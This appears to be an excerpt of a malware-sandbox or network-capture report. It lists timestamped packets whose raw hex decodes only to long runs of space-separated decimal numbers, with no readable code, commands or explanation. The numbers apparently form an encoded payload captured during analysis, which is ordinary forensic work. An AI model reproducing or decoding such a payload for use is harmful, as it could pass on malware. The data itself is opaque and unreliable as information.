                                                                                              2021-09-27 18:27:27 UTC303INData Raw: 38 20 31 35 20 34 38 20 31 37 20 31 31 20 33 37 20 32 36 20 36 35 20 39 35 20 31 20 31 30 37 20 36 39 20 39 34 20 32 20 36 30 20 32 34 20 38 31 20 31 32 20 31 37 20 37 20 39 33 20 39 34 20 36 37 20 35 33 20 32 32 20 33 20 33 33 20 34 39 20 31 35 20 31 33 20 35 30 20 32 31 20 31 30 35 20 33 20 32 39 20 32 36 20 39 20 31 32 34 20 38 31 20 31 30 39 20 39 30 20 36 30 20 36 20 30 20 32 20 39 20 37 31 20 31 32 32 20 31 32 31 20 33 20 36 32 20 36 35 20 35 35 20 31 34 20 35 34 20 36 20 37 32 20 37 31 20 33 20 35 30 20 34 33 20 36 34 20 35 33 20 32 34 20 31 31 36 20 39 32 20 38 35 20 37 36 20 36 33 20 36 33 20 36 38 20 34 36 20 32 33 20 37 35 20 36 20 31 32 33 20 31 31 39 20 31 30 35 20 31 31 34 20 38 36 20 38 30 20 31 20 31 30 37 20 38 39 20 31 30 36 20 39 36 20
                                                                                              Data Ascii: 8 15 48 17 11 37 26 65 95 1 107 69 94 2 60 24 81 12 17 7 93 94 67 53 22 3 33 49 15 13 50 21 105 3 29 26 9 124 81 109 90 60 6 0 2 9 71 122 121 3 62 65 55 14 54 6 72 71 3 50 43 64 53 24 116 92 85 76 63 63 68 46 23 75 6 123 119 105 114 86 80 1 107 89 106 96
                                                                                              2021-09-27 18:27:27 UTC319INData Raw: 20 33 39 20 39 37 20 39 31 20 35 20 38 32 20 35 39 20 37 34 20 33 35 20 35 39 20 34 20 39 30 20 38 37 20 31 35 20 31 31 20 38 34 20 38 31 20 37 32 20 32 38 20 36 30 20 31 30 39 20 39 37 20 31 30 39 20 31 30 30 20 34 38 20 33 39 20 32 34 20 35 30 20 37 20 31 32 30 20 37 20 31 30 30 20 38 33 20 32 20 35 20 33 32 20 32 38 20 33 34 20 31 30 36 20 38 32 20 31 31 35 20 31 31 20 31 30 35 20 31 31 34 20 38 36 20 38 30 20 31 20 31 31 37 20 39 30 20 36 36 20 36 20 32 20 31 36 20 36 37 20 38 20 32 32 20 31 32 35 20 31 32 36 20 36 39 20 31 31 39 20 32 36 20 32 35 20 32 32 20 33 38 20 32 20 31 32 37 20 31 30 30 20 38 39 20 31 32 37 20 32 32 20 31 30 20 36 33 20 32 37 20 32 20 31 31 20 31 31 33 20 39 34 20 38 33 20 31 38 20 32 30 20 36 33 20 33 31 20 32 35 20 37 31 20
                                                                                              Data Ascii: 39 97 91 5 82 59 74 35 59 4 90 87 15 11 84 81 72 28 60 109 97 109 100 48 39 24 50 7 120 7 100 83 2 5 32 28 34 106 82 115 11 105 114 86 80 1 117 90 66 6 2 16 67 8 22 125 126 69 119 26 25 22 38 2 127 100 89 127 22 10 63 27 2 11 113 94 83 18 20 63 31 25 71
                                                                                              2021-09-27 18:27:27 UTC335INData Raw: 36 30 20 33 34 20 31 38 20 38 30 20 37 37 20 35 30 20 31 39 20 31 35 20 37 31 20 34 35 20 31 30 20 35 20 31 31 20 33 31 20 39 34 20 31 32 34 20 31 30 33 20 39 34 20 32 35 20 34 20 35 31 20 35 37 20 35 32 20 31 31 39 20 32 20 39 30 20 31 30 35 20 33 39 20 31 31 20 33 20 36 30 20 37 37 20 31 35 20 34 38 20 31 37 20 31 31 20 33 37 20 36 31 20 36 32 20 36 32 20 32 39 20 31 30 37 20 31 31 37 20 36 20 31 20 34 20 36 34 20 31 35 20 37 33 20 33 37 20 31 30 36 20 36 35 20 31 31 37 20 31 31 35 20 30 20 33 30 20 32 37 20 31 31 20 32 33 20 31 35 20 31 33 20 35 30 20 32 31 20 31 30 35 20 33 20 32 30 20 31 31 20 31 30 20 39 39 20 38 33 20 31 32 37 20 31 31 37 20 33 31 20 36 36 20 31 36 20 35 39 20 33 35 20 38 31 20 36 38 20 31 32 33 20 36 20 32 39 20 31 37 20 34 39 20
                                                                                              Data Ascii: 60 34 18 80 77 50 19 15 71 45 10 5 11 31 94 124 103 94 25 4 51 57 52 119 2 90 105 39 11 3 60 77 15 48 17 11 37 61 62 62 29 107 117 6 1 4 64 15 73 37 106 65 117 115 0 30 27 11 23 15 13 50 21 105 3 20 11 10 99 83 127 117 31 66 16 59 35 81 68 123 6 29 17 49
                                                                                              2021-09-27 18:27:27 UTC351INData Raw: 36 37 20 38 37 20 36 36 20 31 31 20 35 37 20 31 36 20 32 30 20 31 31 32 20 31 31 33 20 36 36 20 38 37 20 38 37 20 33 32 20 32 33 20 34 39 20 38 20 31 39 20 36 34 20 37 33 20 36 36 20 36 36 20 35 39 20 30 20 31 31 37 20 35 37 20 32 20 38 33 20 39 34 20 36 35 20 38 30 20 35 39 20 30 20 32 34 20 34 33 20 32 35 20 39 32 20 38 31 20 39 34 20 31 31 36 20 35 36 20 32 39 20 32 32 20 36 20 31 31 32 20 36 35 20 38 35 20 37 30 20 31 30 35 20 32 31 20 37 20 31 20 32 20 35 34 20 39 34 20 36 39 20 36 35 20 39 34 20 38 34 20 33 33 20 32 35 20 38 20 32 31 20 36 36 20 34 38 20 38 35 20 38 33 20 33 32 20 34 35 20 34 38 20 32 31 20 32 31 20 38 31 20 36 39 20 37 30 20 38 37 20 35 34 20 33 30 20 31 36 20 36 31 20 31 37 20 37 30 20 38 38 20 35 30 20 38 31 20 34 39 20 36 20 34
                                                                                              Data Ascii: 67 87 66 11 57 16 20 112 113 66 87 87 32 23 49 8 19 64 73 66 66 59 0 117 57 2 83 94 65 80 59 0 24 43 25 92 81 94 116 56 29 22 6 112 65 85 70 105 21 7 1 2 54 94 69 65 94 84 33 25 8 21 66 48 85 83 32 45 48 21 21 81 69 70 87 54 30 16 61 17 70 88 50 81 49 6 4
                                                                                              2021-09-27 18:27:27 UTC367INData Raw: 38 20 33 37 20 33 35 20 31 38 32 20 32 34 39 20 31 31 35 20 31 30 30 20 32 33 36 20 38 31 20 33 36 20 35 35 20 35 33 20 35 36 20 37 33 20 31 31 39 20 39 36 20 31 32 37 20 32 34 30 20 31 35 35 20 34 39 20 34 36 20 33 39 20 32 31 33 20 38 33 20 31 30 33 20 32 33 36 20 31 30 35 20 35 38 20 34 35 20 33 35 20 31 38 33 20 31 31 37 20 31 31 36 20 31 31 37 20 31 31 31 20 31 31 33 20 36 30 20 34 35 20 35 35 20 33 35 20 38 33 20 31 32 30 20 31 32 33 20 31 31 32 20 31 31 37 20 33 35 20 31 37 36 20 32 35 31 20 34 33 20 37 32 20 31 32 32 20 31 30 30 20 34 35 20 39 38 20 31 37 39 20 34 31 20 35 38 20 33 39 20 32 30 20 39 39 20 35 33 20 31 30 30 20 31 31 32 20 34 38 20 35 36 20 33 35 20 31 38 32 20 31 35 37 20 39 39 20 32 34 35 20 31 36 34 20 31 30 33 20 35 33 20 35 34
                                                                                              Data Ascii: 8 37 35 182 249 115 100 236 81 36 55 53 56 73 119 96 127 240 155 49 46 39 213 83 103 236 105 58 45 35 183 117 116 117 111 113 60 45 55 35 83 120 123 112 117 35 176 251 43 72 122 100 45 98 179 41 58 39 20 99 53 100 112 48 56 35 182 157 99 245 164 103 53 54
                                                                                              2021-09-27 18:27:27 UTC383INData Raw: 30 36 20 39 34 20 31 37 34 20 31 36 39 20 32 33 35 20 37 30 20 35 34 20 34 36 20 32 30 39 20 31 36 36 20 31 30 39 20 31 31 39 20 32 34 35 20 34 32 20 31 39 38 20 32 30 31 20 31 31 30 20 32 30 38 20 31 38 35 20 32 31 37 20 31 36 37 20 31 35 38 20 32 33 20 31 39 34 20 37 37 20 32 34 33 20 31 37 35 20 31 38 20 33 37 20 33 33 20 31 38 31 20 32 30 32 20 34 36 20 31 38 30 20 32 34 34 20 31 34 35 20 37 31 20 32 32 36 20 31 37 32 20 32 33 20 31 36 38 20 32 32 32 20 34 20 33 31 20 32 32 32 20 32 32 36 20 32 30 32 20 32 37 20 39 34 20 31 33 32 20 31 39 30 20 39 20 32 34 36 20 31 33 34 20 31 38 32 20 37 31 20 32 31 20 31 38 20 37 34 20 32 34 39 20 32 34 39 20 31 38 34 20 32 35 31 20 32 31 38 20 31 34 38 20 32 34 36 20 31 32 31 20 31 37 35 20 39 38 20 31 30 20 32 30
                                                                                              Data Ascii: 06 94 174 169 235 70 54 46 209 166 109 119 245 42 198 201 110 208 185 217 167 158 23 194 77 243 175 18 37 33 181 202 46 180 244 145 71 226 172 23 168 222 4 31 222 226 202 27 94 132 190 9 246 134 182 71 21 18 74 249 249 184 251 218 148 246 121 175 98 10 20
                                                                                              2021-09-27 18:27:27 UTC399INData Raw: 31 35 20 31 35 34 20 31 37 33 20 33 39 20 36 36 20 39 32 20 35 38 20 34 38 20 32 20 32 33 37 20 39 34 20 31 30 37 20 32 36 20 31 30 36 20 33 34 20 31 38 36 20 31 30 30 20 32 30 31 20 39 37 20 31 33 31 20 31 31 31 20 33 31 20 31 31 39 20 31 39 36 20 37 30 20 32 34 35 20 32 34 31 20 31 33 34 20 31 36 31 20 31 31 33 20 31 35 37 20 39 30 20 32 30 30 20 32 33 35 20 31 39 33 20 32 33 32 20 32 35 34 20 34 35 20 38 39 20 31 31 31 20 39 33 20 31 36 32 20 37 39 20 31 32 39 20 34 36 20 38 38 20 32 30 20 31 35 32 20 32 35 35 20 33 34 20 32 30 33 20 32 33 39 20 31 34 35 20 39 39 20 31 35 35 20 32 35 34 20 31 32 20 32 33 36 20 32 35 34 20 32 33 37 20 36 39 20 33 30 20 38 30 20 39 38 20 31 36 35 20 31 35 39 20 31 32 32 20 35 37 20 32 30 36 20 32 32 37 20 31 36 34 20 37
                                                                                              Data Ascii: 15 154 173 39 66 92 58 48 2 237 94 107 26 106 34 186 100 201 97 131 111 31 119 196 70 245 241 134 161 113 157 90 200 235 193 232 254 45 89 111 93 162 79 129 46 88 20 152 255 34 203 239 145 99 155 254 12 236 254 237 69 30 80 98 165 159 122 57 206 227 164 7
                                                                                              2021-09-27 18:27:27 UTC415INData Raw: 33 20 31 33 34 20 35 38 20 31 38 38 20 38 35 20 32 33 32 20 37 36 20 32 32 34 20 31 32 30 20 37 34 20 31 32 31 20 32 31 36 20 32 33 38 20 39 20 31 36 37 20 34 37 20 31 33 20 36 36 20 31 38 31 20 33 39 20 31 38 30 20 39 33 20 31 33 38 20 31 31 20 32 33 20 32 31 30 20 31 31 36 20 31 38 33 20 32 31 32 20 31 33 34 20 32 31 32 20 31 30 30 20 36 39 20 32 34 39 20 31 20 31 36 20 31 37 36 20 39 30 20 38 39 20 31 30 39 20 31 32 30 20 33 38 20 38 37 20 37 37 20 31 38 39 20 31 37 33 20 31 32 37 20 37 31 20 31 33 39 20 31 33 33 20 31 35 20 32 32 32 20 31 37 34 20 32 33 39 20 31 30 37 20 35 33 20 36 31 20 32 34 31 20 31 30 34 20 32 32 36 20 39 35 20 39 38 20 31 32 35 20 31 36 33 20 33 33 20 37 32 20 31 37 37 20 31 32 30 20 32 30 31 20 31 30 32 20 34 32 20 38 32 20 31
                                                                                              Data Ascii: 3 134 58 188 85 232 76 224 120 74 121 216 238 9 167 47 13 66 181 39 180 93 138 11 23 210 116 183 212 134 212 100 69 249 1 16 176 90 89 109 120 38 87 77 189 173 127 71 139 133 15 222 174 239 107 53 61 241 104 226 95 98 125 163 33 72 177 120 201 102 42 82 1
                                                                                              2021-09-27 18:27:27 UTC431INData Raw: 20 39 30 20 31 30 39 20 38 39 20 31 37 39 20 31 36 32 20 36 34 20 31 34 20 36 20 31 37 33 20 31 33 36 20 38 33 20 36 39 20 31 37 35 20 31 36 36 20 32 34 37 20 32 32 32 20 31 39 31 20 32 34 39 20 32 35 34 20 33 20 38 32 20 31 31 36 20 31 37 34 20 31 34 30 20 31 39 36 20 32 38 20 32 30 33 20 32 31 36 20 34 32 20 34 38 20 32 31 32 20 32 34 32 20 31 32 20 31 36 32 20 39 36 20 31 37 32 20 34 35 20 32 39 20 31 32 32 20 32 34 34 20 32 32 35 20 31 31 35 20 31 31 38 20 32 30 30 20 31 32 20 37 36 20 31 38 33 20 32 31 30 20 31 37 30 20 31 34 35 20 31 34 34 20 32 34 33 20 31 33 36 20 32 34 36 20 31 33 30 20 32 33 34 20 33 34 20 31 36 33 20 35 30 20 38 38 20 39 33 20 33 33 20 37 39 20 32 32 30 20 36 36 20 31 34 39 20 31 32 37 20 31 38 20 32 34 36 20 31 34 37 20 31 38
                                                                                              Data Ascii: 90 109 89 179 162 64 14 6 173 136 83 69 175 166 247 222 191 249 254 3 82 116 174 140 196 28 203 216 42 48 212 242 12 162 96 172 45 29 122 244 225 115 118 200 12 76 183 210 170 145 144 243 136 246 130 234 34 163 50 88 93 33 79 220 66 149 127 18 246 147 18
                                                                                              2021-09-27 18:27:27 UTC447INData Raw: 20 31 30 37 20 31 38 35 20 31 36 32 20 35 32 20 34 30 20 32 35 20 31 38 37 20 31 35 38 20 36 37 20 37 35 20 32 35 31 20 31 33 34 20 31 39 31 20 31 36 36 20 32 31 39 20 32 37 20 31 32 31 20 31 38 33 20 35 33 20 31 32 37 20 35 39 20 31 36 37 20 31 39 34 20 32 20 38 33 20 33 39 20 32 34 38 20 32 34 38 20 32 35 30 20 31 33 38 20 32 31 32 20 31 31 37 20 32 34 38 20 31 31 36 20 31 38 31 20 31 37 39 20 35 38 20 37 38 20 31 35 20 32 35 34 20 31 38 20 31 35 39 20 32 35 30 20 31 31 36 20 32 35 35 20 31 32 36 20 31 37 34 20 34 35 20 31 34 39 20 35 20 31 31 31 20 37 30 20 32 33 38 20 31 33 32 20 35 30 20 38 33 20 32 32 20 32 33 33 20 32 34 32 20 32 31 20 31 35 39 20 31 35 33 20 31 30 32 20 31 34 35 20 31 31 35 20 31 32 32 20 36 35 20 32 36 20 31 31 34 20 31 33 37 20
                                                                                              Data Ascii: 107 185 162 52 40 25 187 158 67 75 251 134 191 166 219 27 121 183 53 127 59 167 194 2 83 39 248 248 250 138 212 117 248 116 181 179 58 78 15 254 18 159 250 116 255 126 174 45 149 5 111 70 238 132 50 83 22 233 242 21 159 153 102 145 115 122 65 26 114 137
                                                                                              2021-09-27 18:27:27 UTC463INData Raw: 36 20 31 35 39 20 32 33 33 20 35 35 20 32 35 30 20 31 39 36 20 31 31 37 20 32 35 31 20 33 36 20 31 39 39 20 31 33 20 39 36 20 31 34 32 20 31 39 31 20 31 30 31 20 33 20 37 35 20 31 30 32 20 35 38 20 35 36 20 36 20 31 36 38 20 31 32 32 20 31 37 37 20 39 39 20 32 34 39 20 31 38 35 20 32 32 32 20 32 32 35 20 32 35 32 20 32 35 20 31 33 20 32 35 33 20 32 36 20 31 30 39 20 31 35 36 20 31 38 38 20 36 36 20 31 35 30 20 32 31 33 20 31 31 32 20 36 36 20 36 30 20 37 38 20 32 35 30 20 39 37 20 32 30 35 20 36 31 20 31 31 20 39 37 20 32 32 30 20 38 35 20 31 39 30 20 31 34 38 20 36 36 20 32 31 32 20 31 35 31 20 31 34 34 20 31 35 20 31 33 38 20 31 31 31 20 32 33 34 20 32 31 36 20 31 30 32 20 32 34 37 20 32 32 38 20 31 35 34 20 32 31 36 20 39 34 20 31 36 39 20 32 33 39 20
                                                                                              Data Ascii: 6 159 233 55 250 196 117 251 36 199 13 96 142 191 101 3 75 102 58 56 6 168 122 177 99 249 185 222 225 252 25 13 253 26 109 156 188 66 150 213 112 66 60 78 250 97 205 61 11 97 220 85 190 148 66 212 151 144 15 138 111 234 216 102 247 228 154 216 94 169 239
                                                                                              2021-09-27 18:27:27 UTC479INData Raw: 32 32 39 20 36 32 20 32 35 32 20 31 37 31 20 31 35 31 20 31 36 20 31 35 32 20 31 35 33 20 31 36 38 20 35 33 20 34 37 20 31 31 30 20 31 37 34 20 39 20 31 34 32 20 32 31 20 36 33 20 31 36 31 20 32 34 32 20 32 35 31 20 32 32 35 20 31 36 32 20 32 34 38 20 32 34 31 20 34 35 20 31 32 20 35 39 20 32 33 34 20 33 37 20 31 34 30 20 36 34 20 37 30 20 32 35 34 20 36 39 20 31 32 38 20 32 35 20 31 38 37 20 32 35 35 20 32 34 20 31 33 20 33 36 20 31 37 20 37 32 20 39 36 20 31 33 38 20 32 33 37 20 31 39 34 20 31 34 38 20 31 36 32 20 38 33 20 32 33 36 20 31 30 37 20 32 34 34 20 31 39 39 20 32 33 36 20 33 37 20 31 30 34 20 36 38 20 31 35 30 20 31 37 38 20 32 33 30 20 34 35 20 32 35 31 20 32 35 31 20 31 36 38 20 34 37 20 32 31 37 20 32 35 31 20 31 37 39 20 32 33 35 20 31 30
                                                                                              Data Ascii: 229 62 252 171 151 16 152 153 168 53 47 110 174 9 142 21 63 161 242 251 225 162 248 241 45 12 59 234 37 140 64 70 254 69 128 25 187 255 24 13 36 17 72 96 138 237 194 148 162 83 236 107 244 199 236 37 104 68 150 178 230 45 251 251 168 47 217 251 179 235 10
                                                                                              2021-09-27 18:27:27 UTC495INData Raw: 20 31 30 36 20 39 32 20 31 30 37 20 32 33 32 20 30 20 31 30 38 20 32 30 34 20 31 31 39 20 31 30 37 20 32 33 37 20 31 37 39 20 30 20 31 33 32 20 31 38 33 20 31 33 31 20 34 34 20 32 34 33 20 31 38 33 20 32 34 33 20 31 38 37 20 31 33 34 20 37 36 20 31 39 38 20 31 32 32 20 31 30 30 20 32 30 37 20 31 36 38 20 31 33 39 20 31 37 20 31 32 33 20 37 32 20 32 32 31 20 31 35 37 20 32 35 35 20 31 30 32 20 31 38 31 20 31 38 36 20 31 38 39 20 39 37 20 32 34 31 20 34 37 20 35 30 20 33 30 20 35 20 31 31 36 20 31 34 39 20 35 31 20 31 34 37 20 32 31 39 20 31 32 33 20 31 38 20 31 36 35 20 31 36 39 20 31 34 34 20 31 38 32 20 36 36 20 32 32 39 20 38 33 20 31 37 36 20 31 33 30 20 37 36 20 31 32 36 20 32 36 20 32 34 39 20 34 32 20 32 33 35 20 34 37 20 31 39 36 20 31 31 30 20 32
                                                                                              Data Ascii: 106 92 107 232 0 108 204 119 107 237 179 0 132 183 131 44 243 183 243 187 134 76 198 122 100 207 168 139 17 123 72 221 157 255 102 181 186 189 97 241 47 50 30 5 116 149 51 147 219 123 18 165 169 144 182 66 229 83 176 130 76 126 26 249 42 235 47 196 110 2
                                                                                              2021-09-27 18:27:27 UTC511INData Raw: 20 31 38 38 20 32 30 37 20 31 37 34 20 39 38 20 32 33 31 20 31 34 31 20 38 30 20 37 37 20 31 32 34 20 32 30 34 20 39 35 20 31 32 31 20 32 30 38 20 38 35 20 31 30 33 20 34 32 20 31 33 37 20 36 37 20 34 20 32 30 35 20 32 34 33 20 33 39 20 39 34 20 31 31 33 20 32 32 30 20 38 34 20 39 34 20 31 31 31 20 31 33 36 20 31 37 30 20 31 31 39 20 32 35 33 20 33 30 20 31 33 39 20 31 39 38 20 38 33 20 31 31 37 20 31 35 38 20 31 30 38 20 32 32 36 20 32 32 30 20 32 30 20 31 32 32 20 31 32 38 20 32 32 35 20 31 32 36 20 32 35 32 20 33 30 20 31 36 37 20 38 33 20 32 33 33 20 31 30 31 20 32 32 39 20 31 38 35 20 31 34 37 20 32 38 20 31 31 32 20 32 33 38 20 37 33 20 31 34 34 20 31 37 32 20 31 37 39 20 31 31 31 20 32 32 38 20 32 30 33 20 32 36 20 32 32 34 20 31 38 35 20 31 37 32
                                                                                              Data Ascii: 188 207 174 98 231 141 80 77 124 204 95 121 208 85 103 42 137 67 4 205 243 39 94 113 220 84 94 111 136 170 119 253 30 139 198 83 117 158 108 226 220 20 122 128 225 126 252 30 167 83 233 101 229 185 147 28 112 238 73 144 172 179 111 228 203 26 224 185 172
                                                                                              2021-09-27 18:27:27 UTC527INData Raw: 32 32 39 20 37 38 20 34 35 20 32 31 20 32 32 35 20 36 36 20 31 31 30 20 31 33 39 20 33 35 20 31 38 31 20 32 30 33 20 32 34 38 20 32 31 36 20 33 32 20 31 32 36 20 37 38 20 31 35 34 20 32 32 30 20 31 38 38 20 31 34 33 20 32 38 20 32 32 33 20 32 33 30 20 32 34 35 20 31 30 20 31 37 30 20 34 35 20 31 33 34 20 38 30 20 32 20 32 30 32 20 31 34 36 20 32 38 20 39 35 20 31 36 34 20 32 31 35 20 31 33 37 20 32 31 20 31 37 31 20 39 35 20 31 34 30 20 38 37 20 32 33 38 20 36 32 20 32 34 35 20 38 31 20 31 37 36 20 31 37 36 20 31 36 39 20 34 34 20 35 20 31 37 31 20 35 36 20 38 20 39 38 20 31 38 30 20 32 30 36 20 35 36 20 32 34 38 20 31 37 39 20 31 35 30 20 31 37 30 20 32 31 31 20 39 32 20 35 38 20 31 35 36 20 31 30 39 20 31 33 38 20 36 32 20 39 38 20 31 34 33 20 33 33 20
                                                                                              Data Ascii: 229 78 45 21 225 66 110 139 35 181 203 248 216 32 126 78 154 220 188 143 28 223 230 245 10 170 45 134 80 2 202 146 28 95 164 215 137 21 171 95 140 87 238 62 245 81 176 176 169 44 5 171 56 8 98 180 206 56 248 179 150 170 211 92 58 156 109 138 62 98 143 33
                                                                                              2021-09-27 18:27:27 UTC543INData Raw: 36 37 20 31 31 39 20 32 30 36 20 33 35 20 38 36 20 37 30 20 32 33 30 20 31 36 34 20 31 36 33 20 32 35 31 20 31 36 32 20 32 30 31 20 31 30 20 39 31 20 31 34 33 20 31 33 32 20 31 34 38 20 31 34 36 20 34 30 20 31 37 32 20 31 31 36 20 38 37 20 31 32 31 20 31 35 36 20 31 35 39 20 31 37 36 20 32 31 39 20 32 31 30 20 32 33 20 31 37 33 20 31 39 33 20 31 34 31 20 31 20 32 30 36 20 31 32 33 20 32 37 20 36 30 20 31 32 20 32 34 39 20 32 37 20 32 31 38 20 31 30 33 20 31 31 39 20 31 33 33 20 32 37 20 31 33 31 20 32 33 39 20 34 30 20 32 32 38 20 32 34 38 20 31 39 30 20 36 30 20 37 32 20 31 33 32 20 32 32 30 20 38 31 20 32 34 32 20 31 31 20 36 36 20 32 32 31 20 31 36 30 20 38 35 20 32 35 33 20 31 39 20 32 34 36 20 31 37 30 20 39 32 20 32 36 20 31 38 37 20 36 30 20 31 34
                                                                                              Data Ascii: 67 119 206 35 86 70 230 164 163 251 162 201 10 91 143 132 148 146 40 172 116 87 121 156 159 176 219 210 23 173 193 141 1 206 123 27 60 12 249 27 218 103 119 133 27 131 239 40 228 248 190 60 72 132 220 81 242 11 66 221 160 85 253 19 246 170 92 26 187 60 14
                                                                                              2021-09-27 18:27:27 UTC559INData Raw: 20 31 30 39 20 32 34 20 31 37 33 20 31 33 30 20 31 32 37 20 31 31 37 20 33 37 20 31 36 37 20 35 34 20 31 38 33 20 32 33 30 20 32 38 20 37 39 20 32 32 37 20 32 31 37 20 31 39 32 20 31 30 32 20 32 30 32 20 38 35 20 31 31 35 20 32 31 30 20 31 35 37 20 31 34 32 20 31 30 33 20 34 39 20 32 32 39 20 31 36 30 20 35 33 20 31 33 34 20 31 39 35 20 31 36 34 20 31 38 39 20 31 32 37 20 37 35 20 32 30 33 20 34 35 20 35 35 20 35 37 20 31 36 31 20 31 39 34 20 38 39 20 31 33 34 20 38 20 31 30 33 20 35 36 20 32 32 20 31 37 32 20 31 34 31 20 32 31 37 20 31 31 30 20 31 31 32 20 31 30 32 20 31 32 39 20 32 35 31 20 31 34 20 31 32 31 20 32 34 35 20 31 35 36 20 32 34 31 20 32 32 34 20 31 34 33 20 31 20 31 38 20 35 35 20 32 30 31 20 32 35 32 20 31 35 38 20 31 37 34 20 31 35 35 20
                                                                                              Data Ascii: 109 24 173 130 127 117 37 167 54 183 230 28 79 227 217 192 102 202 85 115 210 157 142 103 49 229 160 53 134 195 164 189 127 75 203 45 55 57 161 194 89 134 8 103 56 22 172 141 217 110 112 102 129 251 14 121 245 156 241 224 143 1 18 55 201 252 158 174 155
                                                                                              2021-09-27 18:27:27 UTC575INData Raw: 35 20 32 38 20 31 35 35 20 31 39 36 20 32 37 20 34 37 20 38 31 20 31 30 39 20 31 37 34 20 31 39 20 32 33 37 20 32 32 36 20 31 34 20 31 35 31 20 38 34 20 37 31 20 31 38 37 20 31 31 36 20 32 30 31 20 34 20 31 39 38 20 32 30 37 20 32 32 30 20 36 30 20 31 34 37 20 35 32 20 31 31 31 20 31 32 34 20 37 30 20 31 36 37 20 31 32 32 20 35 33 20 38 36 20 31 32 20 33 36 20 32 30 30 20 32 35 34 20 31 31 30 20 31 33 31 20 31 34 31 20 32 36 20 32 30 30 20 31 34 32 20 31 39 35 20 32 33 30 20 38 20 34 33 20 31 34 39 20 31 32 37 20 39 35 20 31 36 35 20 31 31 30 20 32 34 33 20 31 39 34 20 34 39 20 33 20 32 31 36 20 39 30 20 32 33 38 20 32 30 37 20 31 30 30 20 31 31 36 20 31 36 32 20 32 31 31 20 31 35 37 20 31 34 39 20 35 32 20 31 37 37 20 35 37 20 32 30 36 20 39 36 20 31 31
                                                                                              Data Ascii: 5 28 155 196 27 47 81 109 174 19 237 226 14 151 84 71 187 116 201 4 198 207 220 60 147 52 111 124 70 167 122 53 86 12 36 200 254 110 131 141 26 200 142 195 230 8 43 149 127 95 165 110 243 194 49 3 216 90 238 207 100 116 162 211 157 149 52 177 57 206 96 11
                                                                                              2021-09-27 18:27:27 UTC587INData Raw: 33 37 20 31 30 35 20 31 35 34 20 31 38 20 31 31 30 20 37 38 20 32 32 37 20 32 30 35 20 32 34 33 20 37 35 20 31 33 31 20 31 33 30 20 31 32 30 20 32 35 34 20 31 33 37 20 39 33 20 31 38 33 20 31 39 20 31 33 30 20 33 37 20 31 37 36 20 32 30 37 20 31 37 39 20 31 37 34 20 31 30 34 20 31 33 35 20 31 39 36 20 39 39 20 31 32 38 20 32 34 36 20 32 32 34 20 32 32 35 20 31 32 34 20 35 37 20 34 35 20 31 33 20 32 32 36 20 31 36 36 20 36 33 20 39 33 20 32 34 32 20 31 20 31 38 35 20 32 34 35 20 37 33 20 31 31 35 20 39 20 31 33 20 34 31 20 37 33 20 36 30 20 32 31 35 20 32 35 30 20 32 33 35 20 31 35 30 20 31 39 20 31 39 31 20 31 36 38 20 32 33 32 20 31 33 30 20 31 30 20 31 30 33 20 35 32 20 38 35 20 31 34 34 20 35 37 20 31 32 30 20 31 39 30 20 37 33 20 33 38 20 32 33 38 20
                                                                                              Data Ascii: 37 105 154 18 110 78 227 205 243 75 131 130 120 254 137 93 183 19 130 37 176 207 179 174 104 135 196 99 128 246 224 225 124 57 45 13 226 166 63 93 242 1 185 245 73 115 9 13 41 73 60 215 250 235 150 19 191 168 232 130 10 103 52 85 144 57 120 190 73 38 238
                                                                                              2021-09-27 18:27:27 UTC603INData Raw: 35 20 32 32 39 20 38 20 39 32 20 35 36 20 35 37 20 31 34 38 20 31 36 39 20 32 31 34 20 31 33 39 20 36 20 32 34 32 20 34 31 20 36 32 20 32 31 35 20 38 32 20 34 39 20 32 31 30 20 38 37 20 37 38 20 31 31 36 20 32 31 30 20 31 30 39 20 31 34 30 20 35 31 20 32 31 37 20 31 35 39 20 31 36 30 20 31 32 36 20 31 34 35 20 32 31 38 20 32 35 33 20 31 30 39 20 32 31 33 20 34 36 20 32 31 38 20 32 31 38 20 35 30 20 38 32 20 34 31 20 32 31 39 20 34 37 20 31 30 38 20 36 30 20 35 32 20 31 33 31 20 35 35 20 32 34 30 20 31 35 36 20 31 36 30 20 32 32 36 20 32 32 20 31 35 39 20 31 33 20 32 20 32 33 31 20 39 33 20 37 36 20 31 32 33 20 32 30 37 20 38 37 20 31 33 38 20 31 30 33 20 31 32 31 20 31 36 34 20 31 30 20 31 31 30 20 31 32 31 20 31 37 35 20 31 38 37 20 31 37 32 20 32 31 39
                                                                                              Data Ascii: 5 229 8 92 56 57 148 169 214 139 6 242 41 62 215 82 49 210 87 78 116 210 109 140 51 217 159 160 126 145 218 253 109 213 46 218 218 50 82 41 219 47 108 60 52 131 55 240 156 160 226 22 159 13 2 231 93 76 123 207 87 138 103 121 164 10 110 121 175 187 172 219
                                                                                              2021-09-27 18:27:27 UTC619INData Raw: 36 20 32 34 31 20 38 36 20 31 32 32 20 31 37 32 20 33 33 20 31 35 36 20 32 33 33 20 37 31 20 31 32 34 20 39 36 20 31 32 39 20 33 30 20 36 38 20 31 39 39 20 38 37 20 32 36 20 31 36 35 20 31 36 36 20 34 32 20 32 31 31 20 32 30 38 20 32 33 20 31 35 37 20 31 31 35 20 31 36 20 31 39 38 20 32 34 37 20 31 31 37 20 32 34 34 20 31 30 35 20 31 36 39 20 34 31 20 39 30 20 31 34 31 20 31 32 39 20 32 30 32 20 32 31 37 20 39 20 31 37 38 20 32 31 32 20 31 38 33 20 31 37 36 20 31 30 32 20 31 32 36 20 31 36 37 20 32 33 31 20 31 30 20 31 38 36 20 31 36 38 20 31 31 37 20 31 32 36 20 31 33 30 20 31 34 33 20 32 31 30 20 31 39 33 20 31 31 34 20 39 36 20 32 36 20 31 34 38 20 39 39 20 31 30 38 20 31 31 34 20 32 32 31 20 36 32 20 32 33 20 31 33 34 20 31 30 30 20 32 32 31 20 31 38
                                                                                              Data Ascii: 6 241 86 122 172 33 156 233 71 124 96 129 30 68 199 87 26 165 166 42 211 208 23 157 115 16 198 247 117 244 105 169 41 90 141 129 202 217 9 178 212 183 176 102 126 167 231 10 186 168 117 126 130 143 210 193 114 96 26 148 99 108 114 221 62 23 134 100 221 18
